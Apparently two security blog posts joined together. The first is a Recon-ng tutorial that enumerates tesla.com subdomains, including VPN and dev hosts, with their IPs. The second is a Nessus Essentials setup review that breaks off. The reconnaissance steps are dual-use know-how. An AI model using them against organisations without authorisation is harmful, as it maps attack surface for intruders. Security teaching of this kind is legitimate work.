In this recon-ng tutorial, discover open source intelligence and easily pivot to new results. Using a modular approach, collect and dig deeper into extracted data.

What is Recon-ng?

Recon-ng is a reconnaissance / OSINT tool with an interface similar to Metasploit. Running recon-ng from the command line speeds up the recon process as it automates gathering information from open sources.

Recon-ng has a variety of options to configure, perform recon, and output results to different report types.

Recon-ng Installation

Installing Recon-ng is very simple and there are a few common ways. Below are a few examples;

Kali:

At the time of this article version 5.1.2 comes pre-installed with Kali Linux. Having said that, its good to run apt-get update && apt-get install recon-ng to ensure latest dependencies installed.

Ubuntu:

Requires git and pip installed.

test@ubuntu:~/$ git clone https://github.com/lanmaster53/recon-ng.git
test@ubuntu:~/$ cd recon-ng
test@ubuntu:~/recon-ng/$ pip install -r REQUIREMENTS

Next to run recon-ng;

test@ubuntu:~/recon-ng/$ ./recon-ng

The Recon-NG console is now loaded.

    _/_/_/    _/_/_/_/    _/_/_/    _/_/_/    _/      _/            _/      _/    _/_/_/
   _/    _/  _/        _/        _/      _/  _/_/    _/            _/_/    _/  _/       
  _/_/_/    _/_/_/    _/        _/      _/  _/  _/  _/  _/_/_/_/  _/  _/  _/  _/  _/_/_/
 _/    _/  _/        _/        _/      _/  _/    _/_/            _/    _/_/  _/      _/ 
_/    _/  _/_/_/_/    _/_/_/    _/_/_/    _/      _/            _/      _/    _/_/_/    
                                                                                        

                                          /\
                                         / \\ /\
    Sponsored by...               /\  /\/  \\V  \/\
                                 / \\/ // \\\\\ \\ \/\
                                // // BLACK HILLS \/ \\
                               www.blackhillsinfosec.com

                  ____   ____   ____   ____ _____ _  ____   ____  ____
                 |____] | ___/ |____| |       |   | |____  |____ |
                 |      |   \_ |    | |____   |   |  ____| |____ |____
                                   www.practisec.com

                      [recon-ng v5.1.2, Tim Tomes (@lanmaster53)]                       

[*] No modules enabled/installed.

[recon-ng][default] > 

Using recon-ng

From the console it is easy to get help and get started with your recon.

[recon-ng][default] > help

Commands (type [help|?] ):
---------------------------------
back            Exits the current context
dashboard       Displays a summary of activity
db              Interfaces with the workspace's database
exit            Exits the framework
help            Displays this menu
index           Creates a module index (dev only)
keys            Manages third party resource credentials
marketplace     Interfaces with the module marketplace
modules         Interfaces with installed modules
options         Manages the current context options
pdb             Starts a Python Debugger session (dev only)
script          Records and executes command scripts
shell           Executes shell commands
show            Shows various framework items
snapshots       Manages workspace snapshots
spool           Spools output to a file
workspaces      Manages workspaces

Recon-ng begins with an empty framework. No modules enabled or installed.

[*] No modules enabled/installed.

How to use Recon-ng:

Create a Workspace

There is a lot of options when using this OSINT tool. Maintaining collected information and notes organised is a necessary part of any OSINT investigation. Creating a workspaces keeps things orderly and easy to find. When using Recon-ng workspaces, all data located and collected is saved within a database in that workspace.

[recon-ng][default] >  workspaces create example_name 

[recon-ng][default] > workspaces create example_name
[recon-ng][example_name] > 

The command recon-ng -w example_name opens or returns directly to that workspace.

test@ubuntu:~/$ recon-ng -w example_name 

[recon-ng][example_name] > 

Recon-ng Marketplace and Modules

Here again the help comes in handy marketplace help shows commands for removing modules, how to find more info, search, refresh and install.

[recon-ng][default] > marketplace help
Interfaces with the module marketplace

Usage: marketplace info|install|refresh|remove|search [...] 

Typing marketplace search displays a list of all the modules. From which you can start following the white rabbit exploring and getting deeper into recon and open source intelligence.

Recon-ng modules

Modules are grouped together under various categories and can be found searching on marketplace

- discovery
- exploitation
- import
- recon
- reporting

Each of the above have sub categories as shown in the table below. Use marketplace search for a full table providing information on version, status (installed or not-installed), date updated, dependencies or require keys.

[recon-ng][example_name] > marketplace search

  +---------------------------------------------------------------------------------------------------+
  |                        Path                        | Version |     Status    |  Updated   | D | K |
  +---------------------------------------------------------------------------------------------------+
  | discovery/info_disclosure/cache_snoop              | 1.1     | not installed | 2020-10-13 |   |   |
  | discovery/info_disclosure/interesting_files        | 1.2     | not installed | 2021-10-04 |   |   |
  | exploitation/injection/command_injector            | 1.0     | not installed | 2019-06-24 |   |   |
  | exploitation/injection/xpath_bruter                | 1.2     | not installed | 2019-10-08 |   |   |
  | import/csv_file                                    | 1.1     | not installed | 2019-08-09 |   |   |
  | import/list                                        | 1.1     | not installed | 2019-06-24 |   |   |
  | import/masscan                                     | 1.0     | not installed | 2020-04-07 |   |   |
  | import/nmap                                        | 1.1     | not installed | 2020-10-06 |   |   |
  | recon/companies-contacts/bing_linkedin_cache       | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/companies-contacts/censys_email_address      | 2.0     | not installed | 2021-05-11 | * | * |
  | recon/companies-contacts/pen                       | 1.1     | not installed | 2019-10-15 |   |   |
  | recon/companies-domains/censys_subdomains          | 2.0     | not installed | 2021-05-10 | * | * |
  | recon/companies-domains/pen                        | 1.1     | not installed | 2019-10-15 |   |   |
  | recon/companies-domains/viewdns_reverse_whois      | 1.1     | not installed | 2021-08-24 |   |   |
  | recon/companies-domains/whoxy_dns                  | 1.1     | not installed | 2020-06-17 |   | * |
  | recon/companies-hosts/censys_org                   | 2.0     | not installed | 2021-05-11 | * | * |
  | recon/companies-hosts/censys_tls_subjects          | 2.0     | not installed | 2021-05-11 | * | * |
  | recon/companies-multi/github_miner                 | 1.1     | not installed | 2020-05-15 |   | * |
  | recon/companies-multi/shodan_org                   | 1.1     | not installed | 2020-07-01 | * | * |
  | recon/companies-multi/whois_miner                  | 1.1     | not installed | 2019-10-15 |   |   |
  | recon/contacts-contacts/abc                        | 1.0     | not installed | 2019-10-11 | * |   |
  | recon/contacts-contacts/mailtester                 | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/contacts-contacts/mangle                     | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/contacts-contacts/unmangle                   | 1.1     | not installed | 2019-10-27 |   |   |
  | recon/contacts-credentials/hibp_breach             | 1.2     | not installed | 2019-09-10 |   | * |
  | recon/contacts-credentials/hibp_paste              | 1.1     | not installed | 2019-09-10 |   | * |
  | recon/contacts-domains/migrate_contacts            | 1.1     | not installed | 2020-05-17 |   |   |
  | recon/contacts-profiles/fullcontact                | 1.1     | not installed | 2019-07-24 |   | * |
  | recon/credentials-credentials/adobe                | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/credentials-credentials/bozocrack            | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/credentials-credentials/hashes_org           | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/domains-companies/censys_companies           | 2.0     | not installed | 2021-05-10 | * | * |
  | recon/domains-companies/pen                        | 1.1     | not installed | 2019-10-15 |   |   |
  | recon/domains-companies/whoxy_whois                | 1.1     | not installed | 2020-06-24 |   | * |
  | recon/domains-contacts/hunter_io                   | 1.3     | not installed | 2020-04-14 |   | * |
  | recon/domains-contacts/metacrawler                 | 1.1     | not installed | 2019-06-24 | * |   |
  | recon/domains-contacts/pen                         | 1.1     | not installed | 2019-10-15 |   |   |
  | recon/domains-contacts/pgp_search                  | 1.4     | not installed | 2019-10-16 |   |   |
  | recon/domains-contacts/whois_pocs                  | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/domains-contacts/wikileaker                  | 1.0     | not installed | 2020-04-08 |   |   |
  | recon/domains-credentials/pwnedlist/account_creds  | 1.0     | not installed | 2019-06-24 | * | * |
  | recon/domains-credentials/pwnedlist/api_usage      | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/domains-credentials/pwnedlist/domain_creds   | 1.0     | not installed | 2019-06-24 | * | * |
  | recon/domains-credentials/pwnedlist/domain_ispwned | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/domains-credentials/pwnedlist/leak_lookup    | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/domains-credentials/pwnedlist/leaks_dump     | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/domains-domains/brute_suffix                 | 1.1     | not installed | 2020-05-17 |   |   |
  | recon/domains-hosts/binaryedge                     | 1.2     | not installed | 2020-06-18 |   | * |
  | recon/domains-hosts/bing_domain_api                | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/domains-hosts/bing_domain_web                | 1.1     | not installed | 2019-07-04 |   |   |
  | recon/domains-hosts/brute_hosts                    | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/domains-hosts/builtwith                      | 1.1     | not installed | 2021-08-24 |   | * |
  | recon/domains-hosts/censys_domain                  | 2.0     | not installed | 2021-05-10 | * | * |
  | recon/domains-hosts/certificate_transparency       | 1.2     | not installed | 2019-09-16 |   |   |
  | recon/domains-hosts/google_site_web                | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/domains-hosts/hackertarget                   | 1.1     | not installed | 2020-05-17 |   |   |
  | recon/domains-hosts/mx_spf_ip                      | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/domains-hosts/netcraft                       | 1.1     | not installed | 2020-02-05 |   |   |
  | recon/domains-hosts/shodan_hostname                | 1.1     | not installed | 2020-07-01 | * | * |
  | recon/domains-hosts/spyse_subdomains               | 1.1     | not installed | 2021-08-24 |   | * |
  | recon/domains-hosts/ssl_san                        | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/domains-hosts/threatcrowd                    | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/domains-hosts/threatminer                    | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/domains-vulnerabilities/ghdb                 | 1.1     | not installed | 2019-06-26 |   |   |
  | recon/domains-vulnerabilities/xssed                | 1.1     | not installed | 2020-10-18 |   |   |
  | recon/hosts-domains/migrate_hosts                  | 1.1     | not installed | 2020-05-17 |   |   |
  | recon/hosts-hosts/bing_ip                          | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/hosts-hosts/censys_hostname                  | 2.0     | not installed | 2021-05-10 | * | * |
  | recon/hosts-hosts/censys_ip                        | 2.0     | not installed | 2021-05-10 | * | * |
  | recon/hosts-hosts/censys_query                     | 2.0     | not installed | 2021-05-10 | * | * |
  | recon/hosts-hosts/ipinfodb                         | 1.2     | not installed | 2021-08-24 |   | * |
  | recon/hosts-hosts/ipstack                          | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/hosts-hosts/resolve                          | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/hosts-hosts/reverse_resolve                  | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/hosts-hosts/ssltools                         | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/hosts-hosts/virustotal                       | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/hosts-locations/migrate_hosts                | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/hosts-ports/binaryedge                       | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/hosts-ports/shodan_ip                        | 1.2     | not installed | 2020-07-01 | * | * |
  | recon/locations-locations/geocode                  | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/locations-locations/reverse_geocode          | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/locations-pushpins/flickr                    | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/locations-pushpins/shodan                    | 1.1     | not installed | 2020-07-07 | * | * |
  | recon/locations-pushpins/twitter                   | 1.1     | not installed | 2019-10-17 |   | * |
  | recon/locations-pushpins/youtube                   | 1.2     | not installed | 2020-09-02 |   | * |
  | recon/netblocks-companies/censys_netblock_company  | 2.0     | not installed | 2021-05-11 | * | * |
  | recon/netblocks-companies/whois_orgs               | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/netblocks-hosts/censys_netblock              | 2.0     | not installed | 2021-05-10 | * | * |
  | recon/netblocks-hosts/reverse_resolve              | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/netblocks-hosts/shodan_net                   | 1.2     | not installed | 2020-07-21 | * | * |
  | recon/netblocks-hosts/virustotal                   | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/netblocks-ports/census_2012                  | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/netblocks-ports/censysio                     | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/ports-hosts/migrate_ports                    | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/ports-hosts/ssl_scan                         | 1.1     | not installed | 2021-08-24 |   |   |
  | recon/profiles-contacts/bing_linkedin_contacts     | 1.2     | not installed | 2021-08-24 |   | * |
  | recon/profiles-contacts/dev_diver                  | 1.1     | not installed | 2020-05-15 |   |   |
  | recon/profiles-contacts/github_users               | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/profiles-profiles/namechk                    | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/profiles-profiles/profiler                   | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/profiles-profiles/twitter_mentioned          | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/profiles-profiles/twitter_mentions           | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/profiles-repositories/github_repos           | 1.1     | not installed | 2020-05-15 |   | * |
  | recon/repositories-profiles/github_commits         | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/repositories-vulnerabilities/gists_search    | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/repositories-vulnerabilities/github_dorks    | 1.0     | not installed | 2019-06-24 |   | * |
  | reporting/csv                                      | 1.0     | not installed | 2019-06-24 |   |   |
  | reporting/html                                     | 1.0     | not installed | 2019-06-24 |   |   |
  | reporting/json                                     | 1.0     | not installed | 2019-06-24 |   |   |
  | reporting/list                                     | 1.0     | not installed | 2019-06-24 |   |   |
  | reporting/proxifier                                | 1.0     | not installed | 2019-06-24 |   |   |
  | reporting/pushpin                                  | 1.0     | not installed | 2019-06-24 |   | * |
  | reporting/xlsx                                     | 1.0     | not installed | 2019-06-24 |   |   |
  | reporting/xml                                      | 1.1     | not installed | 2019-06-24 |   |   |
  +---------------------------------------------------------------------------------------------------+

  D = Has dependencies. See info for details.
  K = Requires keys. See info for details.

Marketplace search brings up the full table, however you can be more specific in your search, a couple of examples

recon-ng][default] >marketplace search ssl
[*] Searching module index for 'ssl'...

  +----------------------------------------------------------------------------+
  |             Path            | Version |     Status    |  Updated   | D | K |
  +----------------------------------------------------------------------------+
  | recon/domains-hosts/ssl_san | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/hosts-hosts/ssltools  | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/ports-hosts/ssl_scan  | 1.1     | not installed | 2021-08-24 |   |   |
  +----------------------------------------------------------------------------+

  D = Has dependencies. See info for details.
  K = Requires keys. See info for details.

[recon-ng][default] > 

To find out more info on a specific module

[recon-ng][default] > marketplace info ssltools 

  +---------------------------------------------------------------------------------------+
  | path          | recon/hosts-hosts/ssltools                                                                                                                                                                                 |
  | name          | SSLTools.com Host Name Lookups                                                                                                                                                                             |
  | author        | Tim Maletic (borrowing from the ssl_san module by Zach Graces)                                                                                                                                             |
  | version       | 1.0                                                                                                                                                                                                        |
  | last_updated  | 2019-06-24                                                                                                                                                                                                 |
  | description   | Uses the ssltools.com site to obtain host names from a site's SSL certificate metadata to update the 'hosts' table.  Security issues with the certificate trust are pushed to the 'vulnerabilities' table. |
  | required_keys | []                                                                                                                                                                                                         |
  | dependencies  | []                                                                                                                                                                                                         |
  | files         | []                                                                                                                                                                                                         |
  | status        | not installed                                                                                                                                                                                              |
  +------------------------------------------------------------------------------------+

[recon-ng][default] > 

As noted above Hackertarget has a module. This will be used as an example on how to use recon-ng.

Recon-ng example

As an example on how to use Recon-ng, hackertarget has a module to gather subdomains recon/domains-hosts/hackertarget. This module uses the Hackertarget API and hostname search.

Install module

To install this module use the following:

[recon-ng][default] > marketplace install hackertarget
[*] Module installed: recon/domains-hosts/hackertarget
[*] Reloading modules...
[recon-ng][default] > 

Load module

[recon-ng][default] > modules load hackertarget
[recon-ng][default][hackertarget] > 

Module Help

The help command from within a loaded module has different options to the global 'help'.
When you are ready to explore more modules use 'back'.

[recon-ng][default][hackertarget] > help

Commands (type [help|?] ):
---------------------------------
back            Exits the current context
dashboard       Displays a summary of activity
db              Interfaces with the workspace's database
exit            Exits the framework
goptions        Manages the global context options
help            Displays this menu
info            Shows details about the loaded module
input           Shows inputs based on the source option
keys            Manages third party resource credentials
modules         Interfaces with installed modules
options         Manages the current context options
pdb             Starts a Python Debugger session (dev only)
reload          Reloads the loaded module
run             Runs the loaded module
script          Records and executes command scripts
shell           Executes shell commands
show            Shows various framework items
spool           Spools output to a file

[recon-ng][default][hackertarget] > 

Set source

Using show options, brings a table showing the source current value set at default.

[recon-ng][default][hackertarget] > show options

  Name    Current Value  Required  Description
  ------  -------------  --------  -----------
  SOURCE  default        yes       source of input (see 'show info' for details)

Now, set the source to the name of the domain investigating. This example uses tesla.com as they have a published big bounty.

Use command options set SOURCE tesla.com

[recon-ng][default][hackertarget] > options set SOURCE tesla.com
SOURCE => tesla.com

Use command info. This shows current value has changed to tesla.com

[recon-ng][default][hackertarget] > info

Options:
  Name    Current Value  Required  Description
  ------  -------------  --------  -----------
  SOURCE  tesla.com      yes       source of input (see 'info' for details)

Source Options:
  default      SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL
  string       string representing a single input
  path         path to a file containing a list of inputs
  query sql    database query returning one column of inputs

Use input to see

[recon-ng][default][hackertarget] > input

  +---------------+
  | Module Inputs |
  +---------------+
  | tesla.com     |
  +---------------+

Run the module

Type run to execute the module.

[recon-ng][default][hackertarget] > run

---------
TESLA.COM
---------
[*] Host: tesla.com
[*] Ip_Address: 104.119.104.74
[*] --------------------------------------------------
[*] Host: o7.ptr6980.tesla.com
[*] Ip_Address: 149.72.144.42
[*] --------------------------------------------------
[*] Host: vpn1.tesla.com
[*] Ip_Address: 8.45.124.215
[*] --------------------------------------------------
[*] Host: apacvpn1.tesla.com
[*] Ip_Address: 8.244.131.215
[*] --------------------------------------------------
[*] Host: cnvpn1.tesla.com
[*] Ip_Address: 114.141.176.215
[*] --------------------------------------------------
[*] Host: vpn2.tesla.com
[*] Ip_Address: 8.47.24.215
[*] --------------------------------------------------
[*] Host: model3.tesla.com
[*] Ip_Address: 205.234.27.221
[*] --------------------------------------------------
[*] Host: o3.ptr1444.tesla.com
[*] Ip_Address: 149.72.152.236
[*] --------------------------------------------------
[*] Host: o2.ptr556.tesla.com
[*] Ip_Address: 149.72.134.64
[*] --------------------------------------------------
[*] Host: o5.ptr8466.tesla.com
[*] Ip_Address: 149.72.172.170
[*] --------------------------------------------------
[*] Host: o6.ptr9437.tesla.com
[*] Ip_Address: 168.245.123.10
[*] --------------------------------------------------
[*] Host: o4.ptr1867.tesla.com
[*] Ip_Address: 149.72.163.58
[*] --------------------------------------------------
[*] Host: marketing.tesla.com
[*] Ip_Address: 13.111.47.196
[*] --------------------------------------------------
[*] Host: o1.ptr2410.link.tesla.com
[*] Ip_Address: 149.72.247.52
[*] --------------------------------------------------
[*] Host: referral.tesla.com
[*] Ip_Address: 72.10.32.90
[*] --------------------------------------------------
[*] Host: mta2.email.tesla.com
[*] Ip_Address: 13.111.4.231
[*] --------------------------------------------------
[*] Host: mta.email.tesla.com
[*] Ip_Address: 13.111.14.190
[*] --------------------------------------------------
[*] Host: xmail.tesla.com
[*] Ip_Address: 204.74.99.100
[*] --------------------------------------------------
[*] Host: comparison.tesla.com
[*] Ip_Address: 64.125.183.133
[*] --------------------------------------------------
[*] Host: apacvpn.tesla.com
[*] Ip_Address: 8.244.67.215
[*] --------------------------------------------------
[*] Host: cnvpn.tesla.com
[*] Ip_Address: 103.222.41.215
[*] --------------------------------------------------
[*] Host: emails.tesla.com
[*] Ip_Address: 13.111.18.27
[*] --------------------------------------------------
[*] Host: mta2.emails.tesla.com
[*] Ip_Address: 13.111.88.1
[*] --------------------------------------------------
[*] Host: mta3.emails.tesla.com
[*] Ip_Address: 13.111.88.2
[*] --------------------------------------------------
[*] Host: mta4.emails.tesla.com
[*] Ip_Address: 13.111.88.52
[*] --------------------------------------------------
[*] Host: mta5.emails.tesla.com
[*] Ip_Address: 13.111.88.53
[*] --------------------------------------------------
[*] Host: mta.emails.tesla.com
[*] Ip_Address: 13.111.62.118
[*] --------------------------------------------------
[*] Host: click.emails.tesla.com
[*] Ip_Address: 13.111.48.179
[*] --------------------------------------------------
[*] Host: view.emails.tesla.com
[*] Ip_Address: 13.111.49.179
[*] --------------------------------------------------
[*] Host: itanswers.tesla.com
[*] Ip_Address: 204.74.99.100
[*] --------------------------------------------------
[*] Host: events.tesla.com
[*] Ip_Address: 13.111.47.195
[*] --------------------------------------------------
[*] Host: www-uat.tesla.com
[*] Ip_Address: 199.66.9.47
[*] --------------------------------------------------
[*] Host: shop.eu.tesla.com
[*] Ip_Address: 205.234.27.221
[*] --------------------------------------------------
[*] Host: mfamobile-dev.tesla.com
[*] Ip_Address: 205.234.27.209
[*] --------------------------------------------------
[*] Host: mfauser-dev.tesla.com
[*] Ip_Address: 205.234.27.209
[*] --------------------------------------------------


-------
SUMMARY
-------
[*] 35 total (35 new) hosts found.

Show hosts

Now we have begun to populate our hosts. Typing show hosts will give you a summary of the resources discovered.

[recon-ng][default][hackertarget] > show hosts
 +----------------------------------------------------------------------------------------------------------------------+
  | rowid |            host         |    ip_address   | region | country | latitude | longitude | notes |    module    |
  +----------------------------------------------------------------------------------------------------------------------+
  | 1   | tesla.com                 | 104.119.104.74  |        |         |          |           |       | hackertarget |
  | 2   | o7.ptr6980.tesla.com      | 149.72.144.42   |        |         |          |           |       | hackertarget |
  | 3   | vpn1.tesla.com            | 8.45.124.215    |        |         |          |           |       | hackertarget |
  | 4   | apacvpn1.tesla.com        | 8.244.131.215   |        |         |          |           |       | hackertarget |
  | 5   | cnvpn1.tesla.com          | 114.141.176.215 |        |         |          |           |       | hackertarget |
  | 6   | vpn2.tesla.com            | 8.47.24.215     |        |         |          |           |       | hackertarget |
  | 7   | model3.tesla.com          | 205.234.27.221  |        |         |          |           |       | hackertarget |
  | 8   | o3.ptr1444.tesla.com      | 149.72.152.236  |        |         |          |           |       | hackertarget |
  | 9   | o2.ptr556.tesla.com       | 149.72.134.64   |        |         |          |           |       | hackertarget |
  | 10  | o5.ptr8466.tesla.com      | 149.72.172.170  |        |         |          |           |       | hackertarget |
  | 11  | o6.ptr9437.tesla.com      | 168.245.123.10  |        |         |          |           |       | hackertarget |
  | 12  | o4.ptr1867.tesla.com      | 149.72.163.58   |        |         |          |           |       | hackertarget |
  | 13  | marketing.tesla.com       | 13.111.47.196   |        |         |          |           |       | hackertarget |
  | 14  | o1.ptr2410.link.tesla.com | 149.72.247.52   |        |         |          |           |       | hackertarget |
  | 15  | referral.tesla.com        | 72.10.32.90     |        |         |          |           |       | hackertarget |
  | 16  | mta2.email.tesla.com      | 13.111.4.231    |        |         |          |           |       | hackertarget |
  | 17  | mta.email.tesla.com       | 13.111.14.190   |        |         |          |           |       | hackertarget |
  | 18  | xmail.tesla.com           | 204.74.99.100   |        |         |          |           |       | hackertarget |
  | 19  | comparison.tesla.com      | 64.125.183.133  |        |         |          |           |       | hackertarget |
  | 20  | apacvpn.tesla.com         | 8.244.67.215    |        |         |          |           |       | hackertarget |
  | 21  | cnvpn.tesla.com           | 103.222.41.215  |        |         |          |           |       | hackertarget |
  | 22  | emails.tesla.com          | 13.111.18.27    |        |         |          |           |       | hackertarget |
  | 23  | mta2.emails.tesla.com     | 13.111.88.1     |        |         |          |           |       | hackertarget |
  | 24  | mta3.emails.tesla.com     | 13.111.88.2     |        |         |          |           |       | hackertarget |
  | 25  | mta4.emails.tesla.com     | 13.111.88.52    |        |         |          |           |       | hackertarget |
  | 26  | mta5.emails.tesla.com     | 13.111.88.53    |        |         |          |           |       | hackertarget |
  | 27  | mta.emails.tesla.com      | 13.111.62.118   |        |         |          |           |       | hackertarget |
  | 28  | click.emails.tesla.com    | 13.111.48.179   |        |         |          |           |       | hackertarget |
  | 29  | view.emails.tesla.com     | 13.111.49.179   |        |         |          |           |       | hackertarget |
  | 30  | itanswers.tesla.com       | 204.74.99.100   |        |         |          |           |       | hackertarget |
  | 31  | events.tesla.com          | 13.111.47.195   |        |         |          |           |       | hackertarget |
  | 32  | www-uat.tesla.com         | 199.66.9.47     |        |         |          |           |       | hackertarget |
  | 33  | shop.eu.tesla.com         | 205.234.27.221  |        |         |          |           |       | hackertarget |
  | 34  | mfamobile-dev.tesla.com   | 205.234.27.209  |        |         |          |           |       | hackertarget |
  | 35  | mfauser-dev.tesla.com     | 205.234.27.209  |        |         |          |           |       | hackertarget |
  +----------------------------------------------------------------------------------------------------------------------+

[*] 35 rows returned

[recon-ng][default][hackertarget] > 

--------------------------------------------------------------

Add API keys to Recon-ng

It is a simple matter to add API keys to recon-ng. Shodan with a PRO account is a highly recommended option. This will enable queries to open ports on your discovered hosts without sending any packets to the target systems.

How to add shodan API key

Create or login to your Shodan account, Go to 'Account" in top right corner. The API Key is listed here on the Account Overview page.

Recon-ng shows the syntax to add an API key is below

[recon-ng][default] > keys add 
Adds/Updates a third party resource credential

Usage: keys add name value

[recon-ng][default] keys add shodan_api bbexampleapikey33 

.recon-ng configuration files

When you install recon-ng on your machine, it creates a folder in your home directory called .recon-ng. Contained in this folder is keys.db. If you are upgrading from one version to another or changed computers, and have previous modules that require keys to work, copy this file from the old version on your system and move it on the new one. You do not have to start all over again.

test@test-desktop:~/.recon-ng$ ls

keys.db  
modules  
modules.yml  
workspaces

test@test-desktop:~/.recon-ng$ 

Conclusion

Recon-ng is a powerful tool that can be further explored by viewing the list of modules. The help within the console is clear, and with a bit of playing around it won't take long to become an expert.

The rise of bug bounties allows you to play with new tools and explore Organizations' every expanding attack surface footprint. Have fun. Don't break the rules.

The post Recon-NG Tutorial appeared first on HackerTarget.com.

Nessus 10.0 even has support for Raspberry Pi allowing it to be deployed anywhere.

A Hacker Target team member grabbed a copy of Nessus Essentials 10.0.0 and installed it on a clean Ubuntu 20.04 system. NB: This is just a quick look at the product. We do not use it commercially as part of the work done by HackerTarget.com as this would require Nessus Pro and, as we favour the Open Source OpenVAS vulnerability scanner.

Register for an Activation Code

Although free, Nessus essentials require the user to register for an activation code.

This activation does not expire however it is one use only. So, if you want to install Nessus on another machine or reinstall it, you need to register for another code.

Check your email for a message from Tenable with the activation code inside.

Download and Install

We are going to run Nessus on Ubuntu Debian. Head to the downloads page

Install takes less than a minute. It is fast and easy as you can seen below.

user@acidburn:~$ sudo dpkg -i Downloads/Nessus-10.0.0-ubuntu1110_amd64.deb
[sudo] password for user:

Selecting previously unselected package nessus.
(Reading database ... 343156 files and directories currently installed.)
Preparing to unpack Nessus-10.0.0-ubuntu1110_amd64.deb ...
Unpacking nessus (10.0.0) ...
Setting up nessus (10.0.0) ...
Unpacking Nessus Scanner Core Components...
Created symlink /etc/systemd/system/nessusd.service -> /lib/systemd/system/nessusd.service.
Created symlink /etc/systemd/system/multi-user.target.wants/nessusd.service -> /lib/systemd/system/nessusd.service.  

 - You can start Nessus Scanner by typing /bin/systemctl start nessusd.service
 - Then go to https://192.168.1.123:8834/ to configure your scanner

At the prompt, start the Nessus scanner start nessusd.service

user@acidburn:~$ /bin/systemctl sudo start nessusd.service

Now check the status to see if it is active/running with systemctl status nessusd

user@acidburn:~$ systemctl status nessusd

After setting an admin password during the web based configuration, I promptly managed to forget it. Reset the Nessus admin password easily using the nessuscli utility:

user@acidburn:~$ sudo /opt/nessus/sbin/nessuscli chpasswd admin

Nessus Management Console

After logging in the first time you are presented with this popup. Launch a host discovery scan to identify what hosts on our network are available to scan. You can choose to do this or close this pop up and come back to to the "Host discovery scan" under the "New Scans" page

It's a simple interface and straight-forward to create a new scan. There is an option to create a New Folder allowing you to keep your scans organised. Once created this folder will appear on the left side under My Scans.

Settings

Settings provide information on the version, last update, license expiration, and Licensed Hosts - indicating how many of the 16 free scans you have used. From the menu on the left, you can access a variety of things such as Proxy Server, Password Management, and 'My Account'. There are a lot more settings to look through but for this post nothing needed to be configured and stuck with the default setup.

Create a Nessus Scan

Creating a scan is easy enough. Click on the  + New Scan  button or "Create a new scan".
This takes you to the Scan Templates screen. Many users only use the default scan option, so clearly defining the available options as Basic Network Scan, Advanced Scan, Web App Tests and Malware Scan helps the user understand the scope of the test. Scrolling down the page shows other options, including those that require an upgrade to Professional to access.

An example is the Basic Network Scan option - see screenshot below - it's easy to see what information goes where. In this instance sticking with the default setup, added the info, and saved the scan.

For the scan target, you could enter a host-name, IP address or a network range.

Launch a Nessus Scan

From this page we can see previously run scans and the newly added scan. The last modified column shows run time of previously launched scans, here you can also select the play button to run the new scan (appearing at the bottom of the list) or re-run a previous scan. Once launched the scan jumps to the top row and goes about its scanning.

Nessus Report and Detection

The test scan did a good of detecting missing updates on the test Ubuntu system. For those unfamiliar with vulnerability scanners, I recommend you take a look at the options to customise the scan policies. One of the most important configurations options for basic network scans is to ensure you are performing credential scan. This allows much more in-depth coverage of the target as the scanner is able to interrogate the system for installed software and packages. Giving valuable information to the scan engine such as patch levels of the system for both Windows or Linux based targets.

Malware detection with Nessus

An interesting feature of Nessus is the known malware detection feature. Malware has been a problem since the days of the first boot loader virus's, however in today's world of ransomware, the threats are wide-spread and potentially devastating to an organisation.

The security industry is creating all manner of network based anomaly detection products to discover unknown malware. This capability seems quite simple and one I suspect will be beneficial to many organisations.

As the Nessus scanner performs a credential based scan of a system it can collect hashes of all the running processes and compare these to an online database that is effectively a clone of a system such as VirusTotal. So it immediately adds a new layer of defence to your Anti-virus capability. If your primary AV client misses a piece of malware; when you run your regular Nessus scan you may still catch the unknown malware. Understand however that like any AV detection it will also not find everything.

Nessus Command Line Scanning

So, the question is - with Nessus Essentials, can a scan be run from the command line? The short answer is no. Nor can it be done with a Nessus Pro account. In previous versions there was more that could be done via the command line, now, other than the initial setup and changing passwords, all scans are done via the GUI.

Nessus API access

What can we do with the API? --> Scans can't be run via the API. According to the answer on the community Q&A - this function is only available to Tenable.sc or Tenable.io consoles.

Conclusion

